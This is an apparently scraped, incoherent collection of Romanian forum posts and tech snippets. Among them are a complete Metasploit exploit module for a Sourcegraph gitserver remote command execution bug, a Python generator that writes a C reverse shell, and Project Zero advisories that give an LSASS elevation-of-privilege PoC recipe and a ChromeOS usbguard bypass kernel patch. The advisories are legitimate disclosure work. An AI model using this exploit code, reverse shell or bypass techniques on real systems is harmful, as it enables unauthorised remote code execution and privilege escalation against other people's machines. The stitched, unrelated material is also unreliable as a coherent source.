Kev

Salut, Afecteaza cumva indexarea paginilor in motoarele de cautare in caz ca instalez un plugin Agree and Disagree cu anul nasterii in index? sau trebuie ceva modificari in robots.txt? Agrew ii redirectioneaza in index2, Disagree back to Google, nu se afiseaza continutul site-ului daca nu completeaza data nasterii, e.g. yourfreedom.ro Multumesc anticipat

Windows and Adobe Reader exploits said to target orgs in Europe and Central America. Microsoft said on Wednesday that an Austria-based company named DSIRF used multiple Windows and Adobe Reader zero-days to hack organizations located in Europe and Central America. Multiple news outlets have published articles like this one, which cited marketing materials and other evidence linking DSIRF to Subzero, a malicious toolset for “automated exfiltration of sensitive/private data” and “tailored access operations [including] identification, tracking and infiltration of threats.” Members of the Microsoft Threat Intelligence Center, or MSTIC, said they have found Subzero malware infections spread through a variety of methods, including the exploitation of what at the time were Windows and Adobe Reader zero-days, meaning the attackers knew of the vulnerabilities before Microsoft and Adobe did. Targets of the attacks observed to date include law firms, banks, and strategic consultancies in countries such as Austria, the UK, and Panama, although those aren’t necessarily the countries in which the DSIRF customers who paid for the attack resided. An email sent to DSIRF seeking comment wasn’t returned. Wednesday’s post is the latest to take aim at the scourge of mercenary spyware sold by private companies. Israel-based NSO Group is the best-known example of a for-profit company selling pricey exploits that often compromise the devices belonging to journalists, attorneys, and activists. Another Israel-based mercenary named Candiru was profiled by Microsoft and University of Toronto’s Citizen Lab last year and was recently caught orchestrating phishing campaigns on behalf of customers that could bypass two-factor authentication. Also on Wednesday, the US House of Representatives Permanent Select Committee on Intelligence held a hearing on the proliferation of foreign commercial spyware. One of the speakers was the daughter of a former hotel manager in Rwanda who was imprisoned after saving hundreds of lives and speaking out about the genocide that had taken place. She recounted the experience of having her phone hacked with NSO spyware the same day she met with the Belgian foreign affairs minister. Referring to DSIRF using the work KNOTWEED, Microsoft researchers wrote: Wednesday’s post also provides detailed indicators of compromise that readers can use to determine if they have been targeted by DSIRF. Microsoft used the term PSOA—short for private-sector offensive actor—to describe cyber mercenaries like DSIRF. The company said most PSOAs operate under one or both of two models. The first, access-as-a-service, sells full end-to-end hacking tools to customers for use in their own operations. In the other model, hack-for-hire, the PSOA carries out the targeted operations itself. Source: arstechnica.com

Accessible and engaging coding for all Enable every student to express themselves through code Paint Inspired by the Logo Turtle, Paint allows students to create animated designs with code Chatbot Make chatbots that crack jokes, answer questions, play games, or tell stories URL: https://www.pickcode.io Try the preview Source: Google

Meet Writesonic: World's only AI writer that helps you write SEO-optimized, long-form (up to 1500 words) blog posts & articles in 15 seconds. Primit de la un amic. URL: https://writesonic.com/

Salut. Detin un Stick WiFi, bun... blalalala vreau sa inchid unitatea din telefon prin WiFi, (Android) Thanks Edit:/ prin hotspot LE:// TeamViewer

Man, din moment ce i-mi indica N+S+E+V pe GPS si viteza cu care ma deplasez + pulsul inimii etc... ar trebui sa existe

Omule, vreau sa stau intr-un loc, iar cand trece cineva pe langa mine cu 170n Km/h sa-mi afiseze viteza, ce mi-ai trimis tu cu imgtflyflklg nu functioneaza, este pentru viteza timpului cu care circuli TU, nu altcineva. Edit:/ sa ma exprim pe intelesul tau: Deci: trece prostul cu permis cumparat de nu stiu de unde cu 200km/h iar eu stationez, capis?

S-a sters, e suc pe tastatura On: cu riscul de a ma repeta, se modifica mesageria vocala intr-o distanta de 500m/1Km

Salut, Apelez pe cineva in reteaua Orange RO, iar cand intervine mesageria vocala, i-mi raspunde cu: in cazul in care persoana respectiva se afla la domiciliu, in cazul in care persoana respectiva se deplaseaza 500m/1Km: aceeasi voce de robot, sa fie din releu? Multumesc

The efficient digital whiteboard. qboard is a wholly client-side whiteboard app with efficient keyboard shortcuts, to make drawing feel as seamless as possible. In the spirit of Vim, it's possible to do everything that isn't drawing without moving your hands. It's hosted on my website. Here's a demo video: Features Here are the default keybindings: Tab cycles through three toolbar visibilities: the full toolbar, a status pane, and completely hidden. Shift snaps lines to multiples of 45°, and makes squares and circles. X is Cut when there's something selected, and Eraser when nothing is selected. The Eraser is element level: it removes entire paths. You can use X to delete whatever you have selected. E or R, when already that color, resets it to black. There are also keybindings with Shift and Ctrl, which you can view in-app. Other neat things you can do: Hit the export button to save to a PDF. The save button exports to a JSON file, which you can later load back in to qboard. Use your browser's paste function (usually Ctrl+V or Cmd+V on Mac) to paste images from the system clipboard. You can also drag images onto the board, or use the file picker on the left side of the screen (labeled Open). Open your saved JSON files with the file picker to replace your current board with one from a file. Alternatively, drag and drop your saved JSON files; instead of overwriting your current board, this will insert the contents of the files into the board after the current page! Right-click to bring up a context menu to change the style. If you have a saved JSON file accessible via a URL, you can make a link that preloads the board with that file, like this one: https://cjquines.com/qboard/?json=example.json. Design principles qboard is made for seamless lecturing. It's designed to be easy to use and nice to look at while sharing your screen. It should also be easy to share what you've written afterward as a PDF. This guides some of its principles: It should be possible to do everything that isn't drawing just with keys. Ideally, only with the keys on one half of the keyboard, to make presentations flow smoothly. You shouldn't need to move your mouse all the way to the left to change tools, or to move your hand to the right to switch to the pen tool. It has pages, rather than extending in different directions. It should feel like writing on multiple blackboards, and not an infinite sheet of paper. - We are considering changing this to allow an infinite scroll mode (see #6). Pages are fixed at a 16:9 ratio, so when that, in full-screen mode, most screens are perfectly filled by qboard. Additionally, when pages are later exported to a PDF, they have the same dimensions as a slideshow. There are some sense to the default keybindings: The three keys I use the most are on F, D, and S. A is assigned to make sense with S, and Shift + F to make sense with F. I tend to switch between colors and back while presenting, hence the E and R bindings. Imitating vim, X is like delete, which both cuts and erases. Ellipse and Rectangle start with E and R, while V is Move in Photoshop too. Q, A, and Z control stroke style, and W, S, and X control fill style. They form a column, going from "least" to "most". The Ctrl keybindings are pretty universal, except maybe D, for Duplicate. Although initially designed for giving lectures, the whiteboard controls are pretty good. Frequently asked questions There was a short period of time when we used a different file format for our JSON files. It's very unlikely that you have such a file. In case you do, you can make it compatible with the modern qboard app by taking the file and wrapping the contents like so: { "qboard-version": 1, "pages": OLD_FILE_CONTENTS_GO_HERE } If we have released a new file version beyond version 1, just opening any old files and saving them again will update them to the latest version. Implementation details It's build on the nwb toolkit, which handles React, Webpack, and Babel. We're using Typescript. The main app is mostly powered through Fabric.js, with KeyboardJS handling keybindings, and pdfmake handling exporting to PDF. We extend the Fabric canvas to a Page class with some convenience functions. The Pages class stores pages in a JSON array; whenever we switch pages, we remove all the objects in the canvas and reload from memory. In other words, we only store the live objects for the current page; all other pages are stored serialized. Boards are serialized to JSON just by collecting the serialized array, and adding a small amount of metadata to ensure compatibility. A saved qboard file is thus entirely human-readable, though since it also stores paths, it may be unwieldy. We also work with two canvas elements. The top canvas is a temporary one that renders lines, ellipses, and rectangles as they're being drawn, and after they're drawn, they're removed and added to the base canvas. The base canvas handles everything else: the move tool, free drawing, the eraser, and so on; the top canvas is hidden for these operations. This is for performance reasons, so the base canvas doesn't have to rerender every time the mouse moves on the top canvas. The main source is qboard.ts, which handles listening to mouse events and switching tools. Everything else is delegated to handlers, which are in individual files: action.ts, which abstracts the actions for the front-end. clipboard.ts, which handles cutting, copying, and pasting. history.ts, which undoes and redoes with a pure(-ish) history stack. keyboard.ts, which catches keyboard events that aren't H. styles.ts, which gives an interface for changing pen style. tools.ts, which implements each non-free-drawing tool. Development Running npm start will start a development server, which watches source files for changes. Run npm run build to generate the static application files, suitable for hosting or offline use. We have linters; run the full suite with npm run lint, and automatically fix most warnings/errors with npm run lint:fix. If you maintain a top-level deploy.js file, you can build the files and deploy in one step by running npm run deploy. We also have a Dockerfile which runs the development server in a container; build the image with docker build -t qboard ., then run with docker run -d --name qboard qboard. Note that this server is not suitable for production use; just host the static files instead. The FabricJS file is huge and it doesn't support tree shaking, so the qboard demo at cjquines.com uses a custom build. It includes gestures, animation, free drawing, interaction, serialization, fabric.Rect, fabric.Ellipse, fabric.Image, fabric.Line, and window.fabric, which I think is the absolute minimum needed for it to work. (Do note that custom build currently has issues, though. If you encounter errors, you may wish to try this demo, which uses the full build.) Download: qboard-master.zip or git clone https://github.com/cjquines/qboard.git Source

Salut, Exista vreo aplicate pentru detectarea vitezei al unui autovehicul, pentru Android? Ce am gasit in Store suntm doar anti-radar {anti-police} Multumesc anticipat

A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the commands that are able to be executed through the git exec REST API. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Sourcegraph gitserver sshCommand RCE', 'Description' => %q{ A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the commands that are able to be executed through the git exec REST API. }, 'Author' => [ 'Altelus1', # github PoC 'Spencer McIntyre' # metasploit module ], 'References' => [ ['CVE', '2022-23642'], ['URL', 'https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9'], ['URL', 'https://github.com/Altelus1/CVE-2022-23642'], ], 'DisclosureDate' => '2022-02-18', # Public disclosure 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory }, ], [ 'Linux Dropper', { 'Platform' => 'linux', # when the OS command is executed, it's executed twice which will cause some of the command stagers to # be corrupt, these two work even for larger payloads because they're downloaded in a single command 'CmdStagerFlavor' => %w[curl wget], 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper }, ] ], 'DefaultOptions' => { 'RPORT' => 3178 }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']), OptString.new('EXISTING_REPO', [false, 'An existing, cloned repository']) ]) end def check res = send_request_exec(Rex::Text.rand_text_alphanumeric(4..11), ['config', '--default', '', 'core.sshCommand']) return CheckCode::Unknown unless res if res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/ # this is the response if the target repo does exist, highly unlikely since it's randomized return CheckCode::Vulnerable('Successfully set core.sshCommand.') elsif res.code == 404 && res.body =~ /"cloneInProgress"/ # this is the response if the target repo does not exist return CheckCode::Vulnerable elsif res.code == 400 && res.body =~ /^invalid command/ # this is the response when the server is patched, regardless of if there are cloned repos return CheckCode::Safe end CheckCode::Unknown end def exploit if datastore['EXISTING_REPO'].blank? @git_repo = send_request_list.sample fail_with(Failure::NotFound, 'Did not identify any cloned repositories on the remote server.') unless @git_repo print_status("Using automatically identified repository: #{@git_repo}") else @git_repo = datastore['EXISTING_REPO'] end print_status("Executing #{target.name} target") @git_origin = Rex::Text.rand_text_alphanumeric(4..11) git_remote = "git@#{Rex::Text.rand_text_alphanumeric(4..11)}:#{Rex::Text.rand_text_alphanumeric(4..11)}.git" vprint_status("Using #{@git_origin} as a fake git origin") send_request_exec(@git_repo, ['remote', 'add', @git_origin, git_remote]) case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end def cleanup return unless @git_repo && @git_origin vprint_status('Cleaning up the git changes...') # delete the remote that was created send_request_exec(@git_repo, ['remote', 'remove', @git_origin]) # unset the core.sshCommand value send_request_exec(@git_repo, ['config', '--unset', 'core.sshCommand']) ensure super end def send_request_exec(repo, args, timeout = 20) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'exec'), 'method' => 'POST', 'data' => { 'Repo' => repo, 'Args' => args }.to_json }, timeout) end def send_request_list res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'list'), 'method' => 'GET', 'vars_get' => { 'cloned' => 'true' } }) fail_with(Failure::Unreachable, 'No server response.') unless res fail_with(Failure::UnexpectedReply, 'The gitserver list API call failed.') unless res.code == 200 && res.get_json_document.is_a?(Array) res.get_json_document end def execute_command(cmd, _opts = {}) vprint_status("Executing command: #{cmd}") res = send_request_exec(@git_repo, ['config', 'core.sshCommand', cmd]) fail_with(Failure::Unreachable, 'No server response.') unless res unless res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/ if res.code == 404 && res.get_json_document.is_a?(Hash) && res.get_json_document['cloneInProgress'] == false fail_with(Failure::BadConfig, 'The specified repository has not been cloned.') end fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.') end send_request_exec(@git_repo, ['push', @git_origin, 'master'], 5) end end # 0day.today [2022-07-17] # Source

Powered by advanced AI machine learning inpainting technology Tips: Try to hug the box to the ENTIRE object (AVOID partial selection) regardless if it were partially blocked. "Undo" can handle box selections, brush strokes and removal results. URL: https://cleanupphotos.com Source

This is a C language reverse shell generator that is written in Python. import time import sys import pyautogui import subprocess # Loading() def processing(): animation = ["[■□□□□□□□□□]","[■■□□□□□□□□]", "[■■■□□□□□□□]", "[■■■■□□□□□□]", "[■■■■■□□□□□]", "[■■■■■■□□□□]", "[■■■■■■■□□□]", "[■■■■■■■■□□]", "[■■■■■■■■■□]", "[■■■■■■■■■■]"] for i in range(len(animation)): time.sleep(0.3) sys.stdout.write("\r" + animation[ i % len(animation)]) sys.stdout.flush() print("\n") # C language reverse shell generator code: def C_rev(): print("Welcome to R-Security C reverse shell generator") print("1 - C language rev shell") user = int(input("Please enter a number for rev shell: ")) if user == 1: ip = input("Enter target IP: ") port = input("Enter target port: ") time.sleep(1) processing() with open("crevshell.c", "w") as payload: payload.write(""" #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <stdlib.h> #include <unistd.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void){ int port = ENTER_TARGET_PORT_HERE; struct sockaddr_in revsockaddr; int sockt = socket(AF_INET, SOCK_STREAM, 0); revsockaddr.sin_family = AF_INET; revsockaddr.sin_port = htons(port); revsockaddr.sin_addr.s_addr = inet_addr("[ENTER_TARGET_IP_HERE"); connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr)); dup2(sockt, 0); dup2(sockt, 1); dup2(sockt, 2); char * const argv[] = {"pwsh", NULL}; execve("{shell}", argv, NULL); return 0; } """) print("[*] Reverse shell created successfully!") print("[!] Do change the target IP and target PORT fields.") print('\033[1m' + "Thank you for using R-Security C reverse shell generator tool" + '\033[0m') C_rev() Source

2FA 3D Secure https://go.rapyd.net/card-acceptance-europe?utm_source=adwords&utm_medium=ppc&utm_term=credit card processing&utm_campaign=2020-07+Card+Acceptance+Europe&hsa_net=adwords&hsa_grp=131304370526&hsa_ad=576528181169&hsa_tgt=kwd-10007631&hsa_kw=credit card processing&hsa_ver=3&hsa_acc=3503966619&hsa_cam=13699788616&hsa_src=g&hsa_mt=b&gclid=EAIaIQobChMIobKGvor2-AIVkN1RCh3pbgMzEAAYASAAEgLYpPD_BwE

On Windows, the buffer for redirected logon context does not protect against spoofing resulting in arbitrary code execution in the LSA leading to local elevation of privilege. advisory-info.txt Windows: Kerberos Redirected Logon Buffer EoP Platform: Windows Server 2022 Class: Elevation of Privilege Security Boundary: User Summary: The buffer for redirected logon context doesn't protect against spoofing resulting in arbitrary code execution in the LSA leading to local EoP. Note: This is distinct from the previous issue I reported (case 70653). That was manipulating the redirected logon credentials buffer, this instead manipulated the buffer used to track the context between CredSSP and the final authentication. The previous issue might be exploitable remotely whereas this is local only as you need to be able to encrypt the buffers. Description: When a remote credential guard connection is made via CredSSP the TSSSP needs to store the credentials for later use by the logon process. This is done by encrypting the credentials using the CredProtect API into a string which can later be passed as the password to LsaLogonUser to complete the logon. The encrypted credentials contain the pointer to the TSSSP context and function pointers to callback functions to get the redirected credentials. The structure also contains a GUID, but that's static across versions of Windows. If I had to guess, the developers assumed that because CredProtect encrypts using a per-logon-session key that a normal user couldn't encrypt their own buffer which would be accepted by the Kerberos package, as both TSSSP and Kerberos run in the SYSTEM logon session. Unfortunately that's not true, CredProtectEx API (and the underlying RtlEncryptMemory) API added a flag to encrypt the buffer for use by the SYSTEM logon session, the user can't decrypt the buffer but that doesn't matter. You do need to do a few tweaks to the buffer to get it accepted but that requires no privileges. At a basic level this can be used to call an arbitrary function in LSASS by encrypting your own buffer and passing it to LsaLogonUser (or it's higher level equivalents) as the password. This doesn't require that Terminal Services is enabled on the machine, but it does need Remote Guard enabled otherwise the Kerberos package will ignore the buffer. LSASS does have CFG/XFG enabled but you could call something like LoadLibrary or WinExec as you control the first parameter's pointer value. Getting memory addresses might not be that difficult as it seems LSASS leaks pointers all over the place, for example the TsPkgContext field in the MS-RDPEAR isolated credential request is just a heap address of the TS_CONTEXT pointer which contains the logon buffer, you could therefore probably use CredSSP itself to setup a suitable buffer and leak its address for any in-process data you need. Fixing wise, the design of this is terrible and shouldn't have passed a basic security design review, but it is what it is. At least you probably should use a unique random value for the magic GUID so that it can't be trivially spoofed. However be careful, the encryption scheme just seems to be CBC with no per-encryption salt or cryptographic authentication which means that if you leave the GUID at the front it might be possible to copy the encrypted GUID from a real buffer (using CredSSP to generate it) then the rest can be corrupted in such a way to allow for exploitation. Proof of Concept: I've provided a PoC as a C++. This will just try and get LoadLibrary called with an arbitrary pointer. It's expected to crash LSASS, however, calling LoadLibrary is just to demonstrate it's possible. I've not put much effort into developing an end to end exploit as it isn't necessary. 1) Compile the C++ project. 2) Enable remote credential guard on the system using the registry from an admin prompt: reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD 3) Run the POC as a non-admin user. Expected Result: The logon should fail. Observed Result: The LSASS process crashes trying to dereference an invalid pointer. This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-06-06. Related CVE Numbers: CVE-2022-24545,CVE-2022-30165. Found by: forshaw@google.com Download: GS20220706153551.tgz (6 KB) Source

IT , sa nu faca prostii utilizatorii Sper sa pot pleca pe la sfarsitul lunii urmatoare (iulie - august) Edit:/ gen spam, scam, s.a.m.d.

Salut, detin 5 blog-uri, urmeaza sa ma internez intr-un spital din Europa, unde am acces la TV doar pe YouTube, dureaza sa iau acces la tot (Google, Yandex, RST, etc..) Este cineva de incredere? imi poate lãsa mesaj privat. Multumesc anticipat.

Am testat eu, functioneaza Tethering Bluetooth sony + alt device (nu-mi permite Android-ul Cablu nu gasesc in sat Thanks man, insa nu gasesc, am gasit doar RCA, online ma abtin

Bun, deci am doua boxe portabile cu auxiliar (in-put) si bluetooth am cautat si am gasit cablu jack <||------||> pot conecta ambele boxe intre ele, iar ulterior sa ma conectez la ele prin bluetooth? Nu gasesc cablu jack Y Nu-mi permite adroid-ul, stiu ca se poate, testat prin bluetooth

DALL·E 2 can create original, realistic images and art from a text description. It can combine concepts, attributes, and styles. Register: https://openai.com/dall-e-2/ Source: Primit de la un amic. Enjoy

Pare a fi a Kamasutra, scris de vreun tocilar onanist Mai poti pune cateva linii din cod te rog:?

Nu!

Salut, este cineva dispus cu un GoPro astazi (Luni 30/5/2022 intre orele 8:50-13:50) in Bucuresti pe calea Victoriei, sa "tragã" niste cadre despre niste gadget-uri? eventual si interviuri. PM Cu stimã Edit:/ a fost cineva? @wirtz mai esti prezent? L.E.: daca nu se poate da T/C -> Trash

ChromeOS uses usbguard when the screen is locked but appears to suffer from bypass issues. ChromeOS' usage of usbguard is bypassable VULNERABILITY DETAILS ChromeOS uses https://usbguard.github.io/ when the screen is locked (but not on the login screen, perhaps because it is expected that code execution is much less helpful when the disk is still encrypted?). When the screen is locked, a policy is applied that might look like this (example from my Pixelbook): ``` allow id 0bda:564b serial \"\\x07LOE65001063010A78M015CFAI06BF12000\" name \"WebCamera\" hash \"KsByWtMB5JtGNDimauArXMiZOThFwagdTWeQsMAZ48c=\" with-interface { 0e:01:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 } with-connect-type \"hardwired\" allow id 1d6b:0002 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"jEP/6WzviqdJ5VSeTUY8PatCNBKeaREvo2OqdplND/o=\" with-interface 09:00:00 with-connect-type \"\" allow id 1d6b:0003 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"3Wo3XWDgen1hD5xM3PSNl3P98kLp1RUTgGQ5HSxtf8k=\" with-interface 09:00:00 with-connect-type \"\" allow id 8087:0a2a serial \"\" name \"\" hash \"AyPZWy2XK0931kB9A/owYfk5xHEqnpDsJfdeLSGIyuk=\" with-interface { e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 } with-connect-type \"hardwired\" #################################################################################################### # Footer. #################################################################################################### block with-interface one-of { 05:*:* 06:*:* 07:*:* 08:*:* } # physical, image, printer, storage allow ``` As you can see, it mostly just allowlists specific devices with full hashes of the expected USB configuration descriptors, and internal USB devices are marked such that they won't be accepted on external USB ports. (Which, by the way, might not actually be necessary, since the USB subsystem's `authorized_default` flag is set to 2 when the screen is locked, not 0, meaning internal USB devices are automatically allowed anyway?) But then at the bottom is this footer that blocks USB devices with interface descriptors that contain the following `bInterfaceClass` values: - USB_CLASS_PHYSICAL (5) - USB_CLASS_STILL_IMAGE (6) - USB_CLASS_PRINTER (7) - USB_CLASS_MASS_STORAGE (8) Afterwards, anything else is permitted. This configuration footer comes from <https://source.chromium.org/chromiumos/chromiumos/codesearch/+/main:src/third_party/chromiumos-overlay/sys-apps/usbguard/files/99-rules.conf>. The interface-based classification of devices was introduced in <https://chromium-review.googlesource.com/c/chromiumos/overlays/chromiumos-overlay/+/1217622/>. Apart from the problem that there is a large amount of attack surface in drivers for devices that don't belong into those USB interface classes, there is another issue with this approach: The kernel often doesn't care what USB class a device claims to be. The way USB drivers tend to work, even for standardized protocols, is that the driver specifies with low priority that it would like to bind to standards-compliant devices using the proper USB interface class, but also specifies with high priority that it would like to bind to specific USB devices based on Vendor ID and Product ID, without caring about their USB interface class. As an example, USB_CLASS_MASS_STORAGE is blocklisted, so a USB stick inserted while the screen is locked doesn't get past the authorization check: [ 6411.611320] usb 1-1: new high-speed USB device number 31 using xhci_hcd [ 6411.738900] usb 1-1: New USB device found, idVendor=0781, idProduct=5580, bcdDevice= 0.10 [ 6411.738910] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3 [ 6411.738916] usb 1-1: Product: [...] [ 6411.738921] usb 1-1: Manufacturer: SanDisk [ 6411.738926] usb 1-1: SerialNumber: [...] [ 6411.740583] usb 1-1: Device is not authorized for usage [ 6414.875133] cros-ec-sensorhub [...] [ 6418.603609] usb 1-1: USB disconnect, device number 31 But if we use a Linux machine with appropriate hardware (I'm using a NET2380 dev board, but you could probably also do it with an unlocked Pixel phone or a Raspberry Pi Zero W or something like that) to emulate a USB Mass Storage device, using <https://docs.kernel.org/usb/mass-storage.html>, and patch one line in the attacker kernel so that it claims to be a billboard, not a storage device: diff --git a/drivers/usb/gadget/function/storage_common.c b/drivers/usb/gadget/function/storage_common.c index b859a158a414..d7452c8458a9 100644 --- a/drivers/usb/gadget/function/storage_common.c +++ b/drivers/usb/gadget/function/storage_common.c @@ -34,7 +34,7 @@ struct usb_interface_descriptor fsg_intf_desc = { .bDescriptorType = USB_DT_INTERFACE, .bNumEndpoints = 2, /* Adjusted during fsg_bind() */ - .bInterfaceClass = USB_CLASS_MASS_STORAGE, + .bInterfaceClass = USB_CLASS_BILLBOARD, .bInterfaceSubClass = USB_SC_SCSI, /* Adjusted during fsg_bind() */ .bInterfaceProtocol = USB_PR_BULK, /* Adjusted during fsg_bind() */ .iInterface = FSG_STRING_INTERFACE, Then we can connect just fine even while the screen is locked - first we get a \"Device is not authorized\" message on the initial connection, then usbguard unblocks us and the kernel probes the device as a mass storage device and scans the partition table: [ 6432.752906] usb 1-1: new high-speed USB device number 32 using xhci_hcd [ 6432.885635] usb 1-1: New USB device found, idVendor=0525, idProduct=a4a5, bcdDevice= 5.17 [ 6432.885647] usb 1-1: New USB device strings: Mfr=3, Product=4, SerialNumber=0 [ 6432.885653] usb 1-1: Product: Mass Storage Gadget [ 6432.885658] usb 1-1: Manufacturer: Linux 5.17.0-rc4+ with net2280 [ 6432.886121] usb 1-1: Device is not authorized for usage [ 6432.891672] usb-storage 1-1:1.0: USB Mass Storage device detected [ 6432.891985] usb-storage 1-1:1.0: Quirks match for vid 0525 pid a4a5: 10000 [ 6432.892090] scsi host0: usb-storage 1-1:1.0 [ 6432.892567] usb 1-1: authorized to connect [ 6433.920354] scsi 0:0:0:0: Direct-Access Linux File-Stor Gadget 0517 PQ: 0 ANSI: 2 [ 6433.922585] sd 0:0:0:0: Power-on or device reset occurred [ 6433.923533] sd 0:0:0:0: [sda] 204800 512-byte logical blocks: (105 MB/100 MiB) [ 6434.030869] sd 0:0:0:0: [sda] Write Protect is off [ 6434.030876] sd 0:0:0:0: [sda] Mode Sense: 0f 00 00 00 [ 6434.136540] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA [ 6434.363462] sda: sda1 sda2 [ 6434.585367] cros-ec-sensorhub [...] [ 6434.588541] sd 0:0:0:0: [sda] Attached SCSI disk I haven't looked at how this issue applies to other USB subsystems in detail, but from a quick glance: - USB_CLASS_PHYSICAL doesn't really show up in the Linux kernel outside of some number-to-string translation table, so I don't think it matters to the kernel. - Same thing with USB_CLASS_STILL_IMAGE. - The usblp subsystem does have an explicit check for USB_CLASS_PRINTER - but that check is intentionally bypassed for known devices that are marked in the kernel as USBLP_QUIRK_BAD_CLASS, and that flag is set for the \"Seiko Epson Receipt Printer M129C\" (vendor 0x04b8, device 0x0202), so you can probably also bypass the blocking of the printer interface class that way. I think the best way forward would be to look into whether it is feasible to rely exclusively on a trust-on-first-use approach. If that is infeasible, you may have to talk to upstream about how userspace can reliably determine which driver(s) a given USB device might be bound to, since I'm not aware of any interface that would let you do that. VERSION Google Chrome 98.0.4758.107 (Official Build) (64-bit) Revision a2ef32d533baed737df9fc2ed8d505405ecf0c66-refs/branch-heads/4758@{#1167} Platform 14388.61.0 (Official Build) stable-channel eve Firmware Version Google_Eve.9584.230.0 Customization ID GOOGLE-EVE ARC 8165997 CREDIT INFORMATION Reporter credit: Jann Horn of Google Project Zero This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-05-25. Found by: jannh@google.com Source